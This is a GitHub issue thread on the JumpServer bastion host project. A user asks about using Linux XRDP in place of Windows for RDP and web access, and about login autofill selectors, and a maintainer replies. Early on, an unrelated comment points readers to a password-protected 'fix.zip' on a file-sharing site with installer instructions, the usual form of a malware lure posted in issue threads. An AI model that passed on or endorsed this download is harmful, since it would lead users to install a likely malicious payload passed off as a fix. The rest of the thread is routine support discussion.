### ISSUE TITLE
[Question] Linux XRDP as a bastion host?

### ISSUE THREAD

**Issue by alandrma** [jumpserver/jumpserver#14024]
### Product Version

v.4.0.1

### Product Edition

- [X] Community Edition
- [ ] Enterprise Edition
- [ ] Enterprise Trial Edition

### Installation Method

- [X] Online Installation (One-click command installation)
- [ ] Offline Package Installation
- [ ] All-in-One
- [ ] 1Panel
- [ ] Kubernetes
- [ ] Source Code

### Environment Information

Environment Staging

### 🤔 Question Description

Hello, I would like to ask whether a bastion host intended for RDP can use Linux XRDP instead of Windows Server?

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BaiJiangJie** [comment]
Are you talking about the remote application publisher?

**Comment by alandrma** [comment]
@BaiJiangJie "Perhaps something like that, we want to try replacing RDP and web access with Linux xrdp, which was previously on Windows."

**Comment by BaiJiangJie** [comment]
Enterprise Edition supports connecting to Linux assets using the xrdp protocol. @alandrma

**Comment by alandrma** [comment]
Hi, I want to ask about the selector for auto-filling when accessing a website. What is the best practice if the login or sign-in button doesn't have an `id`, for example, on a jump server's login page? I've tried following documentation using XPath, but it still doesn't work (it doesn't automatically log in). @BaiJiangJie

**Comment by BaiJiangJie** [comment]
You can try it, using the following script:


```
[
  {
    "step": 1,
    "value": "{USERNAME}",
    "target": "name=username",
    "command": "type"
  },
  {
    "step": 2,
    "value": "{SECRET}",
    "target": "id=password",
    "command": "type"
  },
  {
    "step": 3,
    "value": "",
    "target": "//button[contains(text(),'Sign in')]",
    "command": "click"
  }
]
```

**Comment by alandrma** [comment]
Hii @BaiJiangJie 

I've already tried the script, but I still can't access the jump server website. Additionally, what are the best practices if you're using basic selectors, but the submit login or sign-in button doesn't have an `id`?

**Comment by alandrma** [comment]
Dear @BaiJiangJie 

The login issue has been solved.

**Comment by BaiJiangJie** [comment]
Nice!  @alandrma

**Comment by alandrma** [comment]
Enterprise Edition supports connecting to Linux assets using the xrdp protocol. @alandrma
---
Dear @BaiJiangJie ,

Regarding this, is it possible to perform remote access using RDP or web access with Linux XRDP? The documentation only mentions Windows, and is there a specific setup for this with an enterprise jump server? In Windows, there is the "Windows Remote Application Publisher Tools," but I can't find the equivalent for Linux XRDP.
